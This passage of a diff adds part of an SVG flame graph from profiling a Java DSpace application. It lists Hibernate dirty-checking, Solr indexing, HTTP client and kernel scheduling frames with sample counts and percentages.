+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEntities (31 samples, 4.59%)</title><rect x="596.5" y="469" width="54.1" height="15.0" fill="rgb(86,233,86)" rx="2" ry="2" />
+<text  x="599.51" y="479.5" >org/h..</text>
+</g>
+<g >
+<title>__GI___libc_write (1 samples, 0.15%)</title><rect x="945.6" y="261" width="1.8" height="15.0" fill="rgb(212,67,67)" rx="2" ry="2" />
+<text  x="948.62" y="271.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::set (1 samples, 0.15%)</title><rect x="926.4" y="485" width="1.8" height="15.0" fill="rgb(92,238,92)" rx="2" ry="2" />
+<text  x="929.42" y="495.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (12 samples, 1.78%)</title><rect x="329.4" y="773" width="21.0" height="15.0" fill="rgb(216,73,73)" rx="2" ry="2" />
+<text  x="332.44" y="783.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::isCollectionType (1 samples, 0.15%)</title><rect x="540.7" y="437" width="1.7" height="15.0" fill="rgb(80,228,80)" rx="2" ry="2" />
+<text  x="543.65" y="447.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (13 samples, 1.92%)</title><rect x="243.9" y="869" width="22.7" height="15.0" fill="rgb(216,74,74)" rx="2" ry="2" />
+<text  x="246.91" y="879.5" >d..</text>
+</g>
+<g >
+<title>futex_wait_queue_me (4 samples, 0.59%)</title><rect x="352.1" y="821" width="7.0" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="355.13" y="831.5" ></text>
+</g>
+<g >
+<title>java/lang/Object:::hashCode (1 samples, 0.15%)</title><rect x="919.4" y="469" width="1.8" height="15.0" fill="rgb(107,252,107)" rx="2" ry="2" />
+<text  x="922.44" y="479.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/AppenderSkeleton:::doAppend (1 samples, 0.15%)</title><rect x="917.7" y="517" width="1.7" height="15.0" fill="rgb(109,254,109)" rx="2" ry="2" />
+<text  x="920.69" y="527.5" ></text>
+</g>
+<g >
+<title>pthread_cond_signal@@GLIBC_2.3.2 (1 samples, 0.15%)</title><rect x="287.5" y="917" width="1.8" height="15.0" fill="rgb(240,109,109)" rx="2" ry="2" />
+<text  x="290.54" y="927.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::getRowFromResultSet (1 samples, 0.15%)</title><rect x="942.1" y="453" width="1.8" height="15.0" fill="rgb(60,209,60)" rx="2" ry="2" />
+<text  x="945.13" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/ManyToOneType:::isDirty (1 samples, 0.15%)</title><rect x="645.4" y="437" width="1.7" height="15.0" fill="rgb(52,202,52)" rx="2" ry="2" />
+<text  x="648.38" y="447.5" ></text>
+</g>
+<g >
+<title>__schedule (4 samples, 0.59%)</title><rect x="1169.1" y="245" width="6.9" height="15.0" fill="rgb(219,78,78)" rx="2" ry="2" />
+<text  x="1172.05" y="255.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (79 samples, 11.69%)</title><rect x="106.0" y="837" width="137.9" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="109.01" y="847.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>org/apache/log4j/Category:::callAppenders (1 samples, 0.15%)</title><rect x="950.9" y="437" width="1.7" height="15.0" fill="rgb(99,244,99)" rx="2" ry="2" />
+<text  x="953.86" y="447.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceMetadataBrowseIndexingPlugin:::additionalIndex (10 samples, 1.48%)</title><rect x="970.1" y="565" width="17.4" height="15.0" fill="rgb(90,237,90)" rx="2" ry="2" />
+<text  x="973.06" y="575.5" ></text>
+</g>
+<g >
+<title>Interpreter (3 samples, 0.44%)</title><rect x="945.6" y="453" width="5.3" height="15.0" fill="rgb(212,68,68)" rx="2" ry="2" />
+<text  x="948.62" y="463.5" ></text>
+</g>
+<g >
+<title>java/io/FileOutputStream:::writeBytes (1 samples, 0.15%)</title><rect x="945.6" y="309" width="1.8" height="15.0" fill="rgb(60,209,60)" rx="2" ry="2" />
+<text  x="948.62" y="319.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.15%)</title><rect x="102.5" y="725" width="1.8" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="105.51" y="735.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::put (1 samples, 0.15%)</title><rect x="919.4" y="485" width="1.8" height="15.0" fill="rgb(65,214,65)" rx="2" ry="2" />
+<text  x="922.44" y="495.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isDirty (4 samples, 0.59%)</title><rect x="750.1" y="437" width="7.0" height="15.0" fill="rgb(106,251,106)" rx="2" ry="2" />
+<text  x="753.12" y="447.5" ></text>
+</g>
+<g >
+<title>__poll (1 samples, 0.15%)</title><rect x="968.3" y="341" width="1.8" height="15.0" fill="rgb(250,123,123)" rx="2" ry="2" />
+<text  x="971.31" y="351.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.44%)</title><rect x="359.1" y="869" width="5.2" height="15.0" fill="rgb(220,79,79)" rx="2" ry="2" />
+<text  x="362.11" y="879.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/DefaultEntityAliases:::&lt;init&gt; (1 samples, 0.15%)</title><rect x="1052.1" y="485" width="1.7" height="15.0" fill="rgb(85,232,85)" rx="2" ry="2" />
+<text  x="1055.10" y="495.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (2 samples, 0.30%)</title><rect x="938.6" y="517" width="3.5" height="15.0" fill="rgb(52,202,52)" rx="2" ry="2" />
+<text  x="941.64" y="527.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEntities (11 samples, 1.63%)</title><rect x="545.9" y="453" width="19.2" height="15.0" fill="rgb(85,232,85)" rx="2" ry="2" />
+<text  x="548.89" y="463.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::resize (1 samples, 0.15%)</title><rect x="1155.1" y="485" width="1.7" height="15.0" fill="rgb(75,223,75)" rx="2" ry="2" />
+<text  x="1158.09" y="495.5" ></text>
+</g>
+<g >
+<title>org/hibernate/context/internal/ThreadLocalSessionContext$TransactionProtectionWrapper:::invoke (8 samples, 1.18%)</title><rect x="530.2" y="549" width="13.9" height="15.0" fill="rgb(95,241,95)" rx="2" ry="2" />
+<text  x="533.18" y="559.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.30%)</title><rect x="238.7" y="453" width="3.5" height="15.0" fill="rgb(243,113,113)" rx="2" ry="2" />
+<text  x="241.67" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultDirtyCheckEventListener:::onDirtyCheck (8 samples, 1.18%)</title><rect x="530.2" y="501" width="13.9" height="15.0" fill="rgb(103,248,103)" rx="2" ry="2" />
+<text  x="533.18" y="511.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (5 samples, 0.74%)</title><rect x="1167.3" y="373" width="8.7" height="15.0" fill="rgb(204,56,56)" rx="2" ry="2" />
+<text  x="1170.31" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/ManyToOneType:::isDirty (1 samples, 0.15%)</title><rect x="905.5" y="453" width="1.7" height="15.0" fill="rgb(52,202,52)" rx="2" ry="2" />
+<text  x="908.47" y="463.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.44%)</title><rect x="359.1" y="901" width="5.2" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="362.11" y="911.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::isComponentType (1 samples, 0.15%)</title><rect x="785.0" y="469" width="1.8" height="15.0" fill="rgb(67,216,67)" rx="2" ry="2" />
+<text  x="788.03" y="479.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="238.7" y="325" width="1.7" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="241.67" y="335.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Collection:::getName (1 samples, 0.15%)</title><rect x="933.4" y="405" width="1.7" height="15.0" fill="rgb(84,231,84)" rx="2" ry="2" />
+<text  x="936.40" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultDirtyCheckEventListener:::onDirtyCheck (13 samples, 1.92%)</title><rect x="1055.6" y="469" width="22.7" height="15.0" fill="rgb(52,202,52)" rx="2" ry="2" />
+<text  x="1058.59" y="479.5" >o..</text>
+</g>
+<g >
+<title>__local_bh_enable_ip (6 samples, 0.89%)</title><rect x="511.0" y="693" width="10.4" height="15.0" fill="rgb(247,119,119)" rx="2" ry="2" />
+<text  x="513.98" y="703.5" ></text>
+</g>
+<g >
+<title>hid_irq_in (1 samples, 0.15%)</title><rect x="1113.2" y="325" width="1.7" height="15.0" fill="rgb(210,65,65)" rx="2" ry="2" />
+<text  x="1116.20" y="335.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/util/collections/IdentityMap:::entryArray (1 samples, 0.15%)</title><rect x="795.5" y="469" width="1.7" height="15.0" fill="rgb(103,248,103)" rx="2" ry="2" />
+<text  x="798.50" y="479.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_out (1 samples, 0.15%)</title><rect x="44.9" y="773" width="1.8" height="15.0" fill="rgb(239,106,106)" rx="2" ry="2" />
+<text  x="47.91" y="783.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/WriterAppender:::subAppend (1 samples, 0.15%)</title><rect x="917.7" y="469" width="1.7" height="15.0" fill="rgb(95,242,95)" rx="2" ry="2" />
+<text  x="920.69" y="479.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (3 samples, 0.44%)</title><rect x="907.2" y="485" width="5.3" height="15.0" fill="rgb(76,224,76)" rx="2" ry="2" />
+<text  x="910.22" y="495.5" ></text>
+</g>
+<g >
+<title>hrtimer_interrupt (1 samples, 0.15%)</title><rect x="514.5" y="405" width="1.7" height="15.0" fill="rgb(238,105,105)" rx="2" ry="2" />
+<text  x="517.47" y="415.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.44%)</title><rect x="324.2" y="885" width="5.2" height="15.0" fill="rgb(209,64,64)" rx="2" ry="2" />
+<text  x="327.20" y="895.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="929.9" y="437" width="1.8" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="932.91" y="447.5" ></text>
+</g>
+<g >
+<title>group_sched_in (2 samples, 0.30%)</title><rect x="495.3" y="677" width="3.5" height="15.0" fill="rgb(215,72,72)" rx="2" ry="2" />
+<text  x="498.27" y="687.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/ImmutableHttpProcessor:::process (2 samples, 0.30%)</title><rect x="1160.3" y="469" width="3.5" height="15.0" fill="rgb(82,229,82)" rx="2" ry="2" />
+<text  x="1163.33" y="479.5" ></text>
+</g>
+<g >
+<title>org/apache/http/client/protocol/RequestClientConnControl:::process (1 samples, 0.15%)</title><rect x="1162.1" y="453" width="1.7" height="15.0" fill="rgb(67,215,67)" rx="2" ry="2" />
+<text  x="1165.07" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/spi/CascadeStyle$11:::hasOrphanDelete (1 samples, 0.15%)</title><rect x="1134.1" y="453" width="1.8" height="15.0" fill="rgb(70,218,70)" rx="2" ry="2" />
+<text  x="1137.14" y="463.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.44%)</title><rect x="266.6" y="805" width="5.2" height="15.0" fill="rgb(216,73,73)" rx="2" ry="2" />
+<text  x="269.60" y="815.5" ></text>
+</g>
+<g >
+<title>futex_wait (56 samples, 8.28%)</title><rect x="367.8" y="837" width="97.8" height="15.0" fill="rgb(218,76,76)" rx="2" ry="2" />
+<text  x="370.84" y="847.5" >futex_wait</text>
+</g>
+<g >
+<title>org/dspace/servicemanager/config/DSpaceConfigurationService:::getProperty (4 samples, 0.59%)</title><rect x="1151.6" y="565" width="7.0" height="15.0" fill="rgb(84,231,84)" rx="2" ry="2" />
+<text  x="1154.60" y="575.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEverythingToExecutions (33 samples, 4.88%)</title><rect x="991.0" y="485" width="57.6" height="15.0" fill="rgb(105,250,105)" rx="2" ry="2" />
+<text  x="994.01" y="495.5" >org/hi..</text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/UpdateRequest:::getXML (2 samples, 0.30%)</title><rect x="961.3" y="485" width="3.5" height="15.0" fill="rgb(95,241,95)" rx="2" ry="2" />
+<text  x="964.33" y="495.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/content/StringBody:::writeTo (1 samples, 0.15%)</title><rect x="956.1" y="357" width="1.7" height="15.0" fill="rgb(100,246,100)" rx="2" ry="2" />
+<text  x="959.09" y="367.5" ></text>
+</g>
+<g >
+<title>Interpreter (3 samples, 0.44%)</title><rect x="266.6" y="773" width="5.2" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="269.60" y="783.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="1167.3" y="309" width="1.8" height="15.0" fill="rgb(227,90,90)" rx="2" ry="2" />
+<text  x="1170.31" y="319.5" ></text>
+</g>
+<g >
+<title>[unknown] (13 samples, 1.92%)</title><rect x="243.9" y="917" width="22.7" height="15.0" fill="rgb(208,62,62)" rx="2" ry="2" />
+<text  x="246.91" y="927.5" >[..</text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceContentInOriginalBundleFilterPlugin:::additionalIndex (3 samples, 0.44%)</title><rect x="936.9" y="565" width="5.2" height="15.0" fill="rgb(66,214,66)" rx="2" ry="2" />
+<text  x="939.89" y="575.5" ></text>
+</g>
+<g >
+<title>__schedule (14 samples, 2.07%)</title><rect x="474.3" y="741" width="24.5" height="15.0" fill="rgb(208,62,62)" rx="2" ry="2" />
+<text  x="477.32" y="751.5" >_..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/FlushVisitor:::processCollection (2 samples, 0.30%)</title><rect x="537.2" y="437" width="3.5" height="15.0" fill="rgb(58,208,58)" rx="2" ry="2" />
+<text  x="540.16" y="447.5" ></text>
+</g>
+<g >
+<title>kmem_cache_free (1 samples, 0.15%)</title><rect x="362.6" y="677" width="1.7" height="15.0" fill="rgb(218,77,77)" rx="2" ry="2" />
+<text  x="365.60" y="687.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doList (1 samples, 0.15%)</title><rect x="1050.4" y="501" width="1.7" height="15.0" fill="rgb(106,251,106)" rx="2" ry="2" />
+<text  x="1053.36" y="511.5" ></text>
+</g>
+<g >
+<title>__kmalloc (1 samples, 0.15%)</title><rect x="1113.2" y="277" width="1.7" height="15.0" fill="rgb(223,83,83)" rx="2" ry="2" />
+<text  x="1116.20" y="287.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (2 samples, 0.30%)</title><rect x="360.9" y="789" width="3.4" height="15.0" fill="rgb(204,56,56)" rx="2" ry="2" />
+<text  x="363.86" y="799.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (7 samples, 1.04%)</title><rect x="229.9" y="677" width="12.3" height="15.0" fill="rgb(250,122,122)" rx="2" ry="2" />
+<text  x="232.94" y="687.5" ></text>
+</g>
+<g >
+<title>futex_wait_queue_me (56 samples, 8.28%)</title><rect x="367.8" y="821" width="97.8" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="370.84" y="831.5" >futex_wait_..</text>
+</g>
+<g >
+<title>tcp_schedule_loss_probe (1 samples, 0.15%)</title><rect x="523.2" y="757" width="1.7" height="15.0" fill="rgb(254,128,128)" rx="2" ry="2" />
+<text  x="526.20" y="767.5" ></text>
+</g>
+<g >
+<title>tcp_tx_timestamp (1 samples, 0.15%)</title><rect x="526.7" y="789" width="1.7" height="15.0" fill="rgb(207,60,60)" rx="2" ry="2" />
+<text  x="529.69" y="799.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/HierarchicalConfiguration$DefinedKeysVisitor:::&lt;init&gt; (1 samples, 0.15%)</title><rect x="1148.1" y="389" width="1.8" height="15.0" fill="rgb(78,225,78)" rx="2" ry="2" />
+<text  x="1151.11" y="399.5" ></text>
+</g>
+<g >
+<title>inet6_recvmsg (15 samples, 2.22%)</title><rect x="472.6" y="837" width="26.2" height="15.0" fill="rgb(245,116,116)" rx="2" ry="2" />
+<text  x="475.57" y="847.5" >i..</text>
+</g>
+<g >
+<title>java/lang/String:::toLowerCase (1 samples, 0.15%)</title><rect x="915.9" y="549" width="1.8" height="15.0" fill="rgb(97,243,97)" rx="2" ry="2" />
+<text  x="918.95" y="559.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (1 samples, 0.15%)</title><rect x="917.7" y="373" width="1.7" height="15.0" fill="rgb(221,81,81)" rx="2" ry="2" />
+<text  x="920.69" y="383.5" ></text>
+</g>
+<g >
+<title>native_write_msr (12 samples, 1.78%)</title><rect x="329.4" y="725" width="21.0" height="15.0" fill="rgb(205,58,58)" rx="2" ry="2" />
+<text  x="332.44" y="735.5" ></text>
+</g>
+<g >
+<title>futex_wait (8 samples, 1.18%)</title><rect x="271.8" y="837" width="14.0" height="15.0" fill="rgb(219,78,78)" rx="2" ry="2" />
+<text  x="274.83" y="847.5" ></text>
+</g>
+<g >
+<title>sched_clock_cpu (1 samples, 0.15%)</title><rect x="44.9" y="741" width="1.8" height="15.0" fill="rgb(203,55,55)" rx="2" ry="2" />
+<text  x="47.91" y="751.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (9 samples, 1.33%)</title><rect x="271.8" y="869" width="15.7" height="15.0" fill="rgb(253,127,127)" rx="2" ry="2" />
+<text  x="274.83" y="879.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObjectServiceImpl:::getMetadataByMetadataString (1 samples, 0.15%)</title><rect x="931.7" y="565" width="1.7" height="15.0" fill="rgb(56,206,56)" rx="2" ry="2" />
+<text  x="934.66" y="575.5" ></text>
+</g>
+<g >
+<title>__x64_sys_write (1 samples, 0.15%)</title><rect x="945.6" y="213" width="1.8" height="15.0" fill="rgb(248,120,120)" rx="2" ry="2" />
+<text  x="948.62" y="223.5" ></text>
+</g>
+<g >
+<title>do_sys_poll (4 samples, 0.59%)</title><rect x="1169.1" y="293" width="6.9" height="15.0" fill="rgb(243,113,113)" rx="2" ry="2" />
+<text  x="1172.05" y="303.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (372 samples, 55.03%)</title><rect x="528.4" y="869" width="649.4" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="531.43" y="879.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>tcp_write_xmit (9 samples, 1.33%)</title><rect x="509.2" y="773" width="15.7" height="15.0" fill="rgb(228,90,90)" rx="2" ry="2" />
+<text  x="512.23" y="783.5" ></text>
+</g>
+<g >
+<title>sun/reflect/DelegatingMethodAccessorImpl:::invoke (2 samples, 0.30%)</title><rect x="933.4" y="517" width="3.5" height="15.0" fill="rgb(76,224,76)" rx="2" ry="2" />
+<text  x="936.40" y="527.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/AbstractSessionInputBuffer:::fillBuffer (2 samples, 0.30%)</title><rect x="966.6" y="421" width="3.5" height="15.0" fill="rgb(63,212,63)" rx="2" ry="2" />
+<text  x="969.57" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::doReceiveResponse (1 samples, 0.15%)</title><rect x="952.6" y="469" width="1.7" height="15.0" fill="rgb(67,215,67)" rx="2" ry="2" />
+<text  x="955.60" y="479.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.44%)</title><rect x="266.6" y="837" width="5.2" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="269.60" y="847.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (53 samples, 7.84%)</title><rect x="369.6" y="757" width="92.5" height="15.0" fill="rgb(213,69,69)" rx="2" ry="2" />
+<text  x="372.59" y="767.5" >__perf_even..</text>
+</g>
+<g >
+<title>[libjava.so] (1 samples, 0.15%)</title><rect x="945.6" y="277" width="1.8" height="15.0" fill="rgb(208,62,62)" rx="2" ry="2" />
+<text  x="948.62" y="287.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (6 samples, 0.89%)</title><rect x="1179.5" y="837" width="10.5" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="1182.53" y="847.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/cookie/DefaultCookieSpec:::&lt;init&gt; (1 samples, 0.15%)</title><rect x="1160.3" y="389" width="1.8" height="15.0" fill="rgb(80,227,80)" rx="2" ry="2" />
+<text  x="1163.33" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::sendRequestEntity (2 samples, 0.30%)</title><rect x="954.3" y="453" width="3.5" height="15.0" fill="rgb(50,200,50)" rx="2" ry="2" />
+<text  x="957.35" y="463.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="238.7" y="293" width="1.7" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="241.67" y="303.5" ></text>
+</g>
+<g >
+<title>itable stub (3 samples, 0.44%)</title><rect x="573.8" y="421" width="5.3" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="576.82" y="431.5" ></text>
+</g>
+<g >
+<title>_register_finalizer_Java (1 samples, 0.15%)</title><rect x="1050.4" y="437" width="1.7" height="15.0" fill="rgb(206,59,59)" rx="2" ry="2" />
+<text  x="1053.36" y="447.5" ></text>
+</g>
+<g >
+<title>Interpreter (372 samples, 55.03%)</title><rect x="528.4" y="629" width="649.4" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="531.43" y="639.5" >Interpreter</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEverythingToExecutions (8 samples, 1.18%)</title><rect x="530.2" y="485" width="13.9" height="15.0" fill="rgb(60,209,60)" rx="2" ry="2" />
+<text  x="533.18" y="495.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::prepareQueryStatement (1 samples, 0.15%)</title><rect x="940.4" y="485" width="1.7" height="15.0" fill="rgb(62,211,62)" rx="2" ry="2" />
+<text  x="943.38" y="495.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/MapConfiguration:::getProperty (3 samples, 0.44%)</title><rect x="1151.6" y="517" width="5.2" height="15.0" fill="rgb(109,254,109)" rx="2" ry="2" />
+<text  x="1154.60" y="527.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (1 samples, 0.15%)</title><rect x="1046.9" y="437" width="1.7" height="15.0" fill="rgb(78,226,78)" rx="2" ry="2" />
+<text  x="1049.86" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/SocketInputBuffer:::isDataAvailable (5 samples, 0.74%)</title><rect x="1167.3" y="453" width="8.7" height="15.0" fill="rgb(97,243,97)" rx="2" ry="2" />
+<text  x="1170.31" y="463.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (4 samples, 0.59%)</title><rect x="235.2" y="645" width="7.0" height="15.0" fill="rgb(204,55,55)" rx="2" ry="2" />
+<text  x="238.18" y="655.5" ></text>
+</g>
+<g >
+<title>__fdget (1 samples, 0.15%)</title><rect x="505.7" y="837" width="1.8" height="15.0" fill="rgb(226,88,88)" rx="2" ry="2" />
+<text  x="508.74" y="847.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isDirty (1 samples, 0.15%)</title><rect x="1111.4" y="437" width="1.8" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="1114.45" y="447.5" ></text>
+</g>
+<g >
+<title>java/util/LinkedList:::addAll (1 samples, 0.15%)</title><rect x="936.9" y="517" width="1.7" height="15.0" fill="rgb(88,234,88)" rx="2" ry="2" />
+<text  x="939.89" y="527.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::list (39 samples, 5.77%)</title><rect x="987.5" y="533" width="68.1" height="15.0" fill="rgb(83,230,83)" rx="2" ry="2" />
+<text  x="990.51" y="543.5" >org/hib..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/FlushVisitor:::processCollection (1 samples, 0.15%)</title><rect x="902.0" y="453" width="1.7" height="15.0" fill="rgb(87,234,87)" rx="2" ry="2" />
+<text  x="904.98" y="463.5" ></text>
+</g>
+<g >
+<title>native_write_msr (12 samples, 1.78%)</title><rect x="243.9" y="725" width="21.0" height="15.0" fill="rgb(235,102,102)" rx="2" ry="2" />
+<text  x="246.91" y="735.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (14 samples, 2.07%)</title><rect x="474.3" y="725" width="24.5" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="477.32" y="735.5" >f..</text>
+</g>
+<g >
+<title>pthread_cond_wait@@GLIBC_2.3.2 (9 samples, 1.33%)</title><rect x="271.8" y="901" width="15.7" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="274.83" y="911.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::onFlushEntity (15 samples, 2.22%)</title><rect x="1088.8" y="453" width="26.1" height="15.0" fill="rgb(106,252,106)" rx="2" ry="2" />
+<text  x="1091.76" y="463.5" >o..</text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/AbstractUpdateRequest:::process (7 samples, 1.04%)</title><rect x="1163.8" y="565" width="12.2" height="15.0" fill="rgb(56,206,56)" rx="2" ry="2" />
+<text  x="1166.82" y="575.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::resize (1 samples, 0.15%)</title><rect x="985.8" y="469" width="1.7" height="15.0" fill="rgb(68,216,68)" rx="2" ry="2" />
+<text  x="988.77" y="479.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::tryExecute (3 samples, 0.44%)</title><rect x="952.6" y="501" width="5.2" height="15.0" fill="rgb(92,238,92)" rx="2" ry="2" />
+<text  x="955.60" y="511.5" ></text>
+</g>
+<g >
+<title>org/hibernate/context/internal/ThreadLocalSessionContext$TransactionProtectionWrapper:::invoke (17 samples, 2.51%)</title><rect x="544.1" y="533" width="29.7" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="547.14" y="543.5" >or..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (1 samples, 0.15%)</title><rect x="1013.7" y="437" width="1.7" height="15.0" fill="rgb(59,208,59)" rx="2" ry="2" />
+<text  x="1016.70" y="447.5" ></text>
+</g>
+<g >
+<title>ctx_sched_out (1 samples, 0.15%)</title><rect x="44.9" y="757" width="1.8" height="15.0" fill="rgb(229,93,93)" rx="2" ry="2" />
+<text  x="47.91" y="767.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEverythingToExecutions (9 samples, 1.33%)</title><rect x="687.3" y="469" width="15.7" height="15.0" fill="rgb(74,222,74)" rx="2" ry="2" />
+<text  x="690.28" y="479.5" ></text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.15%)</title><rect x="242.2" y="693" width="1.7" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="245.16" y="703.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (5 samples, 0.74%)</title><rect x="776.3" y="453" width="8.7" height="15.0" fill="rgb(59,208,59)" rx="2" ry="2" />
+<text  x="779.30" y="463.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (78 samples, 11.54%)</title><rect x="107.8" y="805" width="136.1" height="15.0" fill="rgb(226,88,88)" rx="2" ry="2" />
+<text  x="110.75" y="815.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::execute (3 samples, 0.44%)</title><rect x="952.6" y="517" width="5.2" height="15.0" fill="rgb(80,228,80)" rx="2" ry="2" />
+<text  x="955.60" y="527.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (20 samples, 2.96%)</title><rect x="10.0" y="885" width="34.9" height="15.0" fill="rgb(251,125,125)" rx="2" ry="2" />
+<text  x="13.00" y="895.5" >en..</text>
+</g>
+<g >
+<title>schedule (12 samples, 1.78%)</title><rect x="243.9" y="805" width="21.0" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="246.91" y="815.5" ></text>
+</g>
+<g >
+<title>com/sun/proxy/$Proxy40:::isDirty (8 samples, 1.18%)</title><rect x="530.2" y="565" width="13.9" height="15.0" fill="rgb(68,216,68)" rx="2" ry="2" />
+<text  x="533.18" y="575.5" ></text>
+</g>
+<g >
+<title>sun/reflect/GeneratedMethodAccessor16:::invoke (17 samples, 2.51%)</title><rect x="544.1" y="517" width="29.7" height="15.0" fill="rgb(94,240,94)" rx="2" ry="2" />
+<text  x="547.14" y="527.5" >su..</text>
